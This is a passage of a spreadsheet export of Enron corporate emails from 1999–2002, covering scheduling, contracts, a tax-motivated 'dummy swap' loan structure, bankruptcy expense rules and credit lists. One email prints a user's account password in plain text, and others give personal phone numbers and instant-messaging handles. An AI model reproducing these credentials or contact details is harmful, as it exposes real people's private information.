Subject: _x000D_
_x000D_
_x000D_
Hi Vince,_x000D_
_x000D_
I just now heard back from Andrew Karolyi.  He will be here on Monday March_x000D_
12.  Would you be available for dinner either on Sunday March 11 or Monday_x000D_
March 12?_x000D_
Thanks, Dave_x000D_
_x000D_
_x000D_
***********************************_x000D_
Prof. David Ikenberry_x000D_
Jones Graduate School of Management_x000D_
Rice University_x000D_
713-348-5385_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 07:51:10 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Opinions</t>
  </si>
  <si>
    <t>So you just want the new changes to be redlined correct?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Mann, Kay _x000D_
Sent: Thursday, December 13, 2001 9:49 AM_x000D_
To: Adams, Suzanne_x000D_
Subject: Re: Opinions_x000D_
_x000D_
_x000D_
I need you to make the changes in the email, including the date. I want redlines to be able to show the signers the changes, as well as the other lawyers.  Maybe copying the doc to a new file will help._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Tue, 4 Sep 2001 12:16:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'emilio.vicens@enron.com'})</t>
  </si>
  <si>
    <t>RE: Meeting with Anzoategui's Governor</t>
  </si>
  <si>
    <t>Please take note of my previous e-mail on Ramirez's meeting. We may have to change the date of the potencial meeting with Ramirez to maybe Wed. or Thursday or depending on the time of the Governors meeting on Tuesday (although it seems to close)._x000D_
Emilio_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Levy, Alberto  _x000D_
Sent:	Tuesday, September 04, 2001 2:02 PM_x000D_
To:	Vicens, Emilio_x000D_
Cc:	Caranti, Guido; Shapiro, Richard_x000D_
Subject:	Meeting with Anzoategui's Governor_x000D_
_x000D_
Emilio,_x000D_
Chavez is going to Anzoategui tomorrow and tomorrow's agenda was moved to Thursday, and therefor our meeting could not be confirmed. I got a firm appointment for next Tuesday at 4:00 p.m. Regards,_x000D_
ALF</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 14:16:53 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'davis.thames@enron.com', 'lindy.donoho@enron.com'})</t>
  </si>
  <si>
    <t>RE: Rating Agency Presentation</t>
  </si>
  <si>
    <t xml:space="preserve">Not yet - we are pulling together numbers for the package.  We will hit it hard early next week._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donoho, Lindy  _x000D_
Sent:	Tuesday, January 29, 2002 3:47 PM_x000D_
To:	Thames, Davis_x000D_
Cc:	Howard, Kevin A._x000D_
Subject:	FW: Rating Agency Presentation_x000D_
_x000D_
Can I help you with anything else for the TW presentation?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Donoho, Lindy  _x000D_
Sent:	Friday, January 18, 2002 2:20 PM_x000D_
To:	McCarty, Danny; Harris, Steven; Howard, Kevin A.; Thames, Davis_x000D_
Cc:	Geaccone, Tracy; Watson, Kimberly_x000D_
Subject:	Rating Agency Presentation_x000D_
_x000D_
Please see the attached PowerPoint presentation.  This is a first draft of certain sections (Industry Environment, Competitive Environment and Revenue Generation) of the TW Ratings Package._x000D_
_x000D_
 &lt;&lt; File: RatingAgencyTW.ppt &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 2 Nov 2000 07:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Transwestern</t>
  </si>
  <si>
    <t>Thank you very much._x000D_
_x000D_
Mike Grigsby</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 09:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'info@designzine.com'})</t>
  </si>
  <si>
    <t>frozenset({'designzine@dlogic.com'})</t>
  </si>
  <si>
    <t>New edition of designzine.com</t>
  </si>
  <si>
    <t>[IMAGE]=09?=20_x000D_
_x000D_
In the current installment of designzine.com,  you may want to look into so=_x000D_
me=20_x000D_
of the new articles from our =01,zine members.=20_x000D_
_x000D_
In the 20th-anniversary issue of Metropolis,  Blair Kamin is unhappy about=_x000D_
=20_x000D_
Mayor Daley and Chicago architecture. And, encouraged  by mad-cow hysteria =_x000D_
in=20_x000D_
Europe, Claude Fischler offers some fascinating insights  into love, death,=_x000D_
=20_x000D_
food, and consumerism, in [dizajn]  Le journal. These are merely two of a=_x000D_
=20_x000D_
dozen articles from the best design  magazines published today._x000D_
_x000D_
In the Audio  Section, you can listen, if you wish, to my commentary on the=_x000D_
=20_x000D_
passing  of New York designer Lloyd Schwan._x000D_
_x000D_
The Calendar  continues to be the most popular feature on site._x000D_
_x000D_
And make sure you visit designstand.com,  our design-store companion site?_x000D_
_x000D_
Cordially,_x000D_
_x000D_
Mel Byars_x000D_
Editorial Director_x000D_
designzine.com =20_x000D_
_x000D_
?=20_x000D_
_x000D_
?_x000D_
_x000D_
?</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 07:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hey,_x000D_
I just wanted to make sure you knew to use the new form - unilateral _x000D_
confidentiality agreement.  Also, that we wanted to try and get it out to AES _x000D_
either later today or early Monday.  Thanks again for your help._x000D_
Ben</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 10:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alex.goldberg@williams.com'})</t>
  </si>
  <si>
    <t>Gov. Davis Working Group</t>
  </si>
  <si>
    <t xml:space="preserve">The primary contact for Williams will be: Alex Goldberg.? E-mail: _x000D_
alex.goldberg@williams.com _x000D_
Ph. # 918.573.3901_x000D_
Fax # 918.573.6928_x000D_
Address: One Williams Center _x000D_
????????????? MD 41-3 _x000D_
????????????? Tulsa, OK 74172 _x000D_
_x000D_
There will be other topic specific contacts for Williams.? I will get you _x000D_
their info. tomorrow. </t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 09:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'blazersfastbreak@ripcity.com'})</t>
  </si>
  <si>
    <t>Thank you for registering for our email service</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Kate,_x000D_
_x000D_
Thank you for signing up for BLAZERS FASTBREAK!  Soon you'll start receiving _x000D_
information about your Portland Trail Blazers!_x000D_
_x000D_
Your e-mail address and information requests have been successfully added to _x000D_
our database. Included in this email is your password, which you should keep _x000D_
for future reference._x000D_
_x000D_
If you would like to revise your information requests or change your _x000D_
password, please return to the service and select "Options." Follow the same _x000D_
procedure if you ever forget or lose your password._x000D_
_x000D_
Thank you for registering for our service._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----------------------------_x000D_
Your password is: symes816_x000D_
----------------------------_x000D_
_x000D_
Visit http://www.blazers.com for the latest in Trail Blazers information!_x000D_
_x000D_
Visit http://www.rosequarter.com for Rose Quarter Event information._x000D_
To modify or deactivate listing, please click on - _x000D_
http://enn7.enewsnotifier.com/wwwroot/blazers_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 09:35:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: slides</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Glasin, Shirleen  _x000D_
Sent:	Monday, October 08, 2001 8:53 AM_x000D_
To:	Steffes, James D.; West, Terry_x000D_
Subject:	RE: slides_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 30 Sep 1999 05:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Acindar Deal</t>
  </si>
  <si>
    <t xml:space="preserve">Does Jeff's explanation make any sense to you?  _x000D_
---------------------- Forwarded by Brent Hendry/ENRON_DEVELOPMENT on _x000D_
30/09/99 12:23 PM ---------------------------_x000D_
From: Patricia Cini@ECT on 30/09/99 09:14 AM CDT_x000D_
To: Lynn Aven/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Brent Hendry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: Acindar Deal_x000D_
_x000D_
Lynn-_x000D_
_x000D_
This is a response from Jeff Kabel (manager at Enron Argentina) to my _x000D_
question regarding who was advising them on strucuturing a loan through a _x000D_
swap from a tax perspective?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Pat_x000D_
_x000D_
---------------------- Forwarded by Patricia Cini/HOU/ECT on 09/30/99 09:10 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Kabel@ENRON_DEVELOPMENT_x000D_
09/30/99 08:55 AM_x000D_
To: Bernardo Andrews/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Patricia Cini/HOU/ECT@ECT, Federico _x000D_
Cerisoli/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John J _x000D_
Shoobridge/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: Acindar Deal  _x000D_
_x000D_
Though termed "dummy swap" for internal discussions it is actually an _x000D_
out-of-the-money swap for Enron.  That is, to ensure that Acindar repays the _x000D_
loan through the compensating in-the-money purchase of power in 2003 (with no _x000D_
payments from them before this time) we need to structure the swap starting _x000D_
in 1999 in this way.  Andersen has advised us of the tax implications of _x000D_
various financial "risk managment" structures and loans, this one qualifying _x000D_
as the former with no withholding tax levied._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
Bernardo Andrews   09/30/99 11:37 AM_x000D_
_x000D_
To: Patricia Cini/HOU/ECT@ECT_x000D_
cc: Federico Cerisoli/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jeff _x000D_
Kabel/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John J _x000D_
Shoobridge/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: Acindar Deal  _x000D_
_x000D_
We are being advised by Arthur Andersen. We are diiscussing with them on all _x000D_
tax and swap design issues (on taxation purposes)._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Bernardo_x000D_
_x000D_
_x000D_
_x000D_
To: Bernardo Andrews/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: Re: Acindar Deal  _x000D_
_x000D_
Bernardo-_x000D_
_x000D_
Who was advising you on the tax issues of this deal and making the _x000D_
recommendation to set up "dummy swaps"?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Pat_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 07:41:36 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lloyd.dickerson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'donna.finnels-neal@enron.com'})</t>
  </si>
  <si>
    <t>RE: Choose your IM</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
Just realized it's probably easier to add me to your MSN list if you have my address: lladmba@hotmail.com_x000D_
 _x000D_
LD_x000D_
 _x000D_
-----Original Message-----_x000D_
From: Dickerson, Lloyd _x000D_
Sent: Monday, November 19, 2001 08:43_x000D_
To: Finnels-Neal, La Donna_x000D_
Subject: Choose your IM_x000D_
 _x000D_
Good morning,_x000D_
 _x000D_
Since we are all spread out in the new building, IM will probably be used more.  Here's how to find me on MSN (LLoyd) and AOL (ladpower)._x000D_
 _x000D_
Keep in touch,_x000D_
Lloyd</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Shirley Crenshaw/HOU/ECT on 09/28/2000 _x000D_
10:26 AM ---------------------------_x000D_
_x000D_
_x000D_
allan.roberts@uk.arthurandersen.com on 09/26/2000 09:41:47 AM_x000D_
To: Shirley.Crenshaw@enron.com_x000D_
cc:  _x000D_
Subject: Re: Lunch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Shirley,_x000D_
_x000D_
Thank you for your e-mail, I hope all has turned out well with Vince and his_x000D_
family._x000D_
_x000D_
This is my first day back in the office, so the reason for contacting you is _x000D_
to_x000D_
acknowledge receipt of your note and to inquire as to when Vince will next be _x000D_
in_x000D_
the UK._x000D_
_x000D_
Please contact me at you convenience,_x000D_
_x000D_
ALLAN_x000D_
_x000D_
To:  Allan Roberts_x000D_
cc:_x000D_
Date: 18/09/2000 16:18_x000D_
From: Shirley.Crenshaw@enron.com_x000D_
Subject:  Re: Lunch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Allen:_x000D_
_x000D_
I apologize!  I tried to call on the numbers below, but they would not go_x000D_
through.  I sent you an email explaining why Vince was not there,_x000D_
unfortunately_x000D_
it did not get to you in time!_x000D_
_x000D_
Vince's wife and son were driving to California for his junior year at_x000D_
Stanford._x000D_
They stopped in Phoenix and his wife got sick.  Vince is afraid he will_x000D_
have to_x000D_
fly out there and drive them on to Calif._x000D_
_x000D_
Please accept our deepest apologies and we will reschedule for October,_x000D_
if it is ok._x000D_
_x000D_
Regards,_x000D_
_x000D_
Shirley Crenshaw_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
allan.roberts@uk.arthurandersen.com on 09/18/2000 09:08:15 AM_x000D_
_x000D_
To:   Shirley.Crenshaw@enron.com_x000D_
cc:   chris.j.osborne@uk.arthurandersen.com,_x000D_
      richard.p.emerton@uk.arthurandersen.com,_x000D_
      mike.pilgrem@uk.arthurandersen.com,_x000D_
      angela.mindley@uk.arthurandersen.com_x000D_
Subject:  Lunch_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Shirley,_x000D_
_x000D_
My colleagues and I were expecting to lunch with Vince today._x000D_
Unfortunately,_x000D_
Vince did not show._x000D_
_x000D_
The reason for contacting you is to inform you of the situation and to_x000D_
enquire_x000D_
as to whether everything is OK._x000D_
_x000D_
His plane arrived on time, but we have not heard from him today._x000D_
_x000D_
If you need to contact me urgently, please call me on +44 370 584 695, or_x000D_
my EA_x000D_
Angela on +44 7304 8102._x000D_
_x000D_
Regards, ALLAN_x000D_
_x000D_
*******************Internet Email Confidentiality Footer*******************_x000D_
_x000D_
_x000D_
Privileged/Confidential Information may be contained in this message.  If_x000D_
you_x000D_
are not the addressee indicated in this message (or responsible for_x000D_
delivery of_x000D_
the message to such person), you may not copy or deliver this message to_x000D_
anyone._x000D_
In such case, you should destroy this message and kindly notify the sender_x000D_
by_x000D_
reply email. Please advise immediately if you or your employer do not_x000D_
consent to_x000D_
Internet email for messages of this kind.  Opinions, conclusions and other_x000D_
information in this message that do not relate to the official business of_x000D_
my_x000D_
firm shall be understood as neither given nor endorsed by it._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
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 not consent _x000D_
to_x000D_
Internet email for messages of this kind.  Opinions, conclusions and other_x000D_
information in this message that do not relate to the official business of my_x000D_
firm shall be understood as neither given nor endorsed by it._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 10:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'carrie.robert@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Summary report of Activity</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is a summary report for experienceENRON first quarter activity.  _x000D_
Management of each operating unit has already received their specific report._x000D_
_x000D_
Please contact me with questions or changes._x000D_
_x000D_
Thank you._x000D_
Carrie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 03:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kevin.a.boone@accenture.com'})</t>
  </si>
  <si>
    <t>Re: bs</t>
  </si>
  <si>
    <t>let's meet up at grasshopper</t>
  </si>
  <si>
    <t>Mon, 17 Dec 2001 06:36:21 -0800 (PST)</t>
  </si>
  <si>
    <t>FROM RAYMOND BOWEN, JR., EVP, FINANCE &amp; TREASURER</t>
  </si>
  <si>
    <t xml:space="preserve">To:		All Enron Employees_x000D_
_x000D_
From:	Raymond Bowen, Jr._x000D_
		EVP, Finance &amp; Treasurer_x000D_
_x000D_
Subject:	Update on Employee Expense Reimbursement_x000D_
_x000D_
_x000D_
Post-Petition Expenses_x000D_
_x000D_
Effective immediately, the processing of expense reimbursement for business expenses incurred by employees after Enron Corp.'s Chapter 11 filing (after December 2nd) has returned to normal.  Expenses will be reimbursed promptly upon submission.  Employees should conduct business travel in the ordinary course of business as approved by direct supervisors.  New travel and entertainment guidelines regarding business travel and other employee expenses will be forthcoming.  In the meantime, please use discretion as you incur expenses.  All expenditures should be made with consideration given to Enron's current financial situation._x000D_
_x000D_
Pre-Petition Expenses_x000D_
_x000D_
We will immediately begin to reimburse pre-petition expenses for current and former employees (incurred prior to the December 2nd Chapter 11 filing) up to a maximum of $5,000.  We understand that a number of employees have pre-petition expenses in excess of $5,000.  However, under the first day orders of the bankruptcy court, there is a $15,000 allowance per employee for unpaid pre-petition compensation, benefits, and related employee expenses.  This $15,000 cap was imposed without input from Enron management and counsel.  We have sought clarification from the bankruptcy court to assure that this $15,000 cap does NOT include the reimbursement of medical, dental, or vision related expenses._x000D_
_x000D_
We have commenced a manual review of every individual with pending pre-petition expenses in excess of $5,000.  Even prior to clarification from the court regarding the medical/dental/vision expense issue, we will begin to reimburse pre-petition expenses in excess of $5,000 and up to $15,000 as soon as we can verify that the aggregate reimbursements to an individual employee have not exceeded the $15,000 cap.  Unfortunately, since this will be a manual process, it will take some time to work through.  Employees with pre-petition business expenses in excess of $5,000 can assist us with this manual review process by providing a brief email summary of their situation, including the total amount of pending pre-petition medical/dental/vision claims, to expensereport@enron.com._x000D_
_x000D_
Thank you for your patience._x000D_
</t>
  </si>
  <si>
    <t>Mon, 31 Jan 2000 09:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stacy.dickson@enron.com', 'harry.collins@enron.com', 'david.portz@enron.com', 'alan.aronowitz@enron.com', 'elizabeth.sager@enron.com', 'jeffrey.hodge@enron.com', 'mark.taylor@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>EOL Credit Responses 1/31</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tana Jones/HOU/ECT on 01/31/2000 05:13 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Molly Harris_x000D_
01/31/2000 05:04 PM_x000D_
To: Frank L Davis/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Samuel Schott/HOU/ECT@ECT_x000D_
cc: Bob Shults/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Bernice _x000D_
Rodriguez/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Debbie _x000D_
R Brackett/HOU/ECT@ECT, Brian Hunter-Lindsay/LON/ECT@ECT, Coenraad _x000D_
Basson/LON/ECT@ECT, Bhautik Patel/LON/ECT@ECT, David Hardy/LON/ECT@ECT, David _x000D_
Weekes/LON/ECT@ECT, Sylvia A Campos/HOU/ECT@ECT, Carrie Southard/HOU/ECT@ECT, _x000D_
Lisa Gillette/HOU/ECT@ECT _x000D_
Subject: EOL Credit Responses 1/31_x000D_
_x000D_
_x000D_
_x000D_
Please find attached Credit's EOL responses for 1/31/00._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
Molly_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 07:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>leander and the Stage</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 02/21/2001 _x000D_
03:57 PM ---------------------------_x000D_
_x000D_
_x000D_
"Jeff Smith" &lt;jsmith@austintx.com&gt; on 02/21/2001 01:24:15 PM_x000D_
To: &lt;Phillip.K.Allen@enron.com&gt;_x000D_
cc:  _x000D_
Subject: leander and the Stage_x000D_
_x000D_
_x000D_
Phillip,_x000D_
_x000D_
I spoke with AMF's broker today, and they will be satisfied with the deal if_x000D_
we can get the school to agree to limit the current land use restrictions to_x000D_
the terms that are in the existing agreement.  They do not want the school_x000D_
to come back at a later date for something different.  Doug Bell will meet_x000D_
with a school official on Monday to see what their thoughts are about the_x000D_
subject.  It would be hard for them to change the current agreement, but AMF_x000D_
wants something in writing to that effect.  I spoke to AMF's attorney today,_x000D_
and explained the situation.  They are OK with deal if AMF is satisfied._x000D_
_x000D_
AMF's broker said that they will be ready to submit their site plan after_x000D_
the March 29 hearing.  We may close this deal in April._x000D_
_x000D_
The Stage is still on go.  An assumption package has been sent to the buyer,_x000D_
and I have overnighted a copy of the contract and a description of the_x000D_
details to Wayne McCoy._x000D_
_x000D_
I will be gone Thurs. and Fri. of this week.  I will be checking my_x000D_
messages._x000D_
_x000D_
Jeff Smith_x000D_
The Smith Company_x000D_
2714 Bee Cave Road, Suite 100-D_x000D_
Austin, Texas? 78746_x000D_
512-732-0009_x000D_
512-732-0010 fax_x000D_
512-751-9728 mobile_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 03:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'georgen@epenergy.com'})</t>
  </si>
  <si>
    <t>RE: References for Board Appointment</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks,  As you know I have wanted to do this for a long time.  Now it is_x000D_
time to have fun.   Nancy_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Kenneth.Lay@enron.com [SMTP:Kenneth.Lay@enron.com]_x000D_
&gt; Sent: Friday, September 08, 2000 8:11 PM_x000D_
&gt; To: George, Nancy W._x000D_
&gt; Subject: Re: References for Board Appointment_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Hi Nancy -_x000D_
&gt;_x000D_
&gt; Ken asked me to tell you that you can absolutely use him as a reference._x000D_
&gt;_x000D_
&gt; Hope you are doing just great._x000D_
&gt;_x000D_
&gt; Rosalee_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; "George, Nancy W." &lt;GeorgeN@EPEnergy.com&gt; on 08/30/2000 02:43:38 PM_x000D_
&gt;_x000D_
&gt; To:   "'kenneth.lay@enron.com'" &lt;kenneth.lay@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt; Subject:  References for Board Appointment_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Ken,_x000D_
&gt;_x000D_
&gt; Bruce Peterson at Korn/Ferry International has offered to suggest my name_x000D_
&gt; to_x000D_
&gt; various corporations for board appointments.  I plan to leave El Paso at_x000D_
&gt; the_x000D_
&gt; end of the year.  Please find attached a draft of my background_x000D_
&gt; information._x000D_
&gt; May I use you as a reference?  Let me know if this meets with your_x000D_
&gt; approval._x000D_
&gt; I enjoyed seeing you and your family at the convention.  Thank you in_x000D_
&gt; advance for your assistance._x000D_
&gt;_x000D_
&gt; Nancy_x000D_
&gt;_x000D_
&gt;  &lt;&lt;NWG Background Info.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; ******************************************************************_x000D_
&gt; This email and any files transmitted with it from El Paso_x000D_
&gt; Energy Corporation are confidential and intended solely_x000D_
&gt; for the use of the individual or entity to whom they are_x000D_
&gt; addressed. If you have received this email in error_x000D_
&gt; please notify the sender._x000D_
&gt; ******************************************************************_x000D_
&gt;_x000D_
&gt; (See attached file: NWG Background Info.doc)_x000D_
&gt;_x000D_
&gt;  &lt;&lt; File: NWG Background Info.doc &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 14:23:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.wininger@enron.com', 'carol.north@enron.com', 'veronica.valdez@enron.com', 'd..hare@enron.com', 'genia.fitzgerald@enron.com', 'h..moore@enron.com', 'erich.holzer@enron.com', 'mark.ruane@enron.com', 'molly.harris@enron.com', 'pearce.hammond@enron.com', 'justin.rostant@enron.com', 'dan.mccairns@enron.com', 'l..copeland@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'rebecca.phillips@enron.com', 'daniel.diamond@enron.com', 'monica.reasoner@enron.com', 'cindy.hudler@enron.com', 'john.zurita@enron.com', 'suneet.sharma@enron.com', 'stephanie.piwetz@enron.com', 'flavia.negrete@enron.com', 'jane.wilhite@enron.com', 'credit &lt;.williams@enron.com&gt;', 'richard.ring@enron.com', 'kimberly.hundl@enron.com', 'kerri.thompson@enron.com', 'lucy.ortiz@enron.com', 'lisa.shoemake@enron.com', 'kate.symes@enron.com', 'sharen.cason@enron.com', 'ann.murphy@enron.com', 'tanya.rohauer@enron.com', 'teresa.seibel@enron.com', 'heather.dunton@enron.com', 's..theriot@enron.com', 'harry.bucalo@enron.com', 'j..vitrella@enron.com', 'gregory.schockling@enron.com', 'denise.furey@enron.com', 'r..brackett@enron.com', 'john.suttle@enron.com', 'veronica.gonzalez@enron.com', 'claudette.harvey@enron.com', 'clinton.anderson@enron.com', 's..bradford@enron.com', 'veronica.espinoza@enron.com', 'nichole.gunter@enron.com', 'lorie.leigh@enron.com', 'david.portz@enron.com', 'mercy.gil@enron.com', 'lisa.gillette@enron.com', 'chris.slaughter@enron.com', 'teresa.mandola@enron.com', 'leslie.hansen@enron.com', 'jae.black@enron.com', 'kortney.brown@enron.com', 'adriana.celedon@enron.com', 'christian.yoder@enron.com', 'terri.greenlee@enron.com', 'mark.fischer@enron.com', 'susan.rance@enron.com', 'wendy.conwell@enron.com', 'randy.otto@enron.com', 'e..power@enron.com', 'evelyn.metoyer@enron.com', 'y..brown@enron.com', 'bryan.hull@enron.com', 'wendi.lebrocq@enron.com', 'chaun.roberts@enron.com', 'dana.smith@enron.com', 'maribel.monterrey@enron.com', 'ken.curry@enron.com', 'm..presto@enron.com', 'amanda.kellner@enron.com', 'l..denton@enron.com', 'tracy.ngo@enron.com', 'rudwell.johnson@enron.com', 'paul.radous@enron.com', 'kimberly.indelicato@enron.com', "martin.o'leary@enron.com", 'nidia.mendoza@enron.com', 'amy.smith@enron.com', 'george.wood@enron.com', 'darren.vanek@enron.com', 'lisa.lees@enron.com', 'judy.martinez@enron.com', 'stephanie.sever@enron.com', 'john.llodra@enron.com', 'max.sonnonstine@enron.com', 'elizabeth.sager@enron.com', 'edward.sacks@enron.com', 'tina.rode@enron.com', 'lesli.campbell@enron.com', 'aparna.rajaram@enron.com', 'jubran.whalan@enron.com', 'sue.vasan@enron.com', 'kysa.alport@enron.com'})</t>
  </si>
  <si>
    <t>Power Credit Watch List</t>
  </si>
  <si>
    <t>Please find attached the Power Credit Watch List for October 22:_x000D_
_x000D_
 _x000D_
_x000D_
Please reply with any questions._x000D_
_x000D_
Thank you._x000D_
_x000D_
Kortney</t>
  </si>
  <si>
    <t>Thu, 6 Dec 2001 15:31:44 -0800 (PST)</t>
  </si>
  <si>
    <t>Data Sheets</t>
  </si>
  <si>
    <t>Deb,  Could you pull data sheets for me on the following entities:_x000D_
_x000D_
Louisiana Resources Company_x000D_
LRCI, Inc._x000D_
Louisiana Gas Marketing Company_x000D_
LGMI, Inc._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>GE Turbine Contract Insertion Language</t>
  </si>
  <si>
    <t xml:space="preserve">I hope this is the last thing.  Here's the latest version of the contract _x000D_
sans these insertions._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/23/2001 12:14 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
04/19/2001 03:06 PM_x000D_
To: lee.johnson@ss.ps.com, kent.shoemaker@ae.ge.com_x000D_
cc: Stephen Thome/HOU/ECT@ECT, Jake Thomas/HOU/ECT@ECT _x000D_
_x000D_
Subject: GE Turbine Contract Insertion Language_x000D_
_x000D_
Here's what Delta would like in the Salmon break out contract.  How does it _x000D_
look to you?_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/19/2001 03:02 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Richard Vicens" &lt;rvicens@deltapower.com&gt; on 04/19/2001 03:12:54 PM_x000D_
To: &lt;Stephen.Thome@enron.com&gt;, &lt;kay.mann@enron.com&gt;, &lt;CCampbell@KSLAW.com&gt;_x000D_
cc: "Lang, Gregory F." &lt;gregorylang@paulhastings.com&gt;, "PARKER, Isabel" _x000D_
&lt;isabel.parker@freshfields.com&gt;, "Anthony Harrington" _x000D_
&lt;aharrington@deltapower.com&gt; _x000D_
_x000D_
Subject: GE Turbine Contract Insertion Language_x000D_
_x000D_
_x000D_
_x000D_
 - Adjustment Language.DOC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 15:20:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'melissa.videtto@enron.com'})</t>
  </si>
  <si>
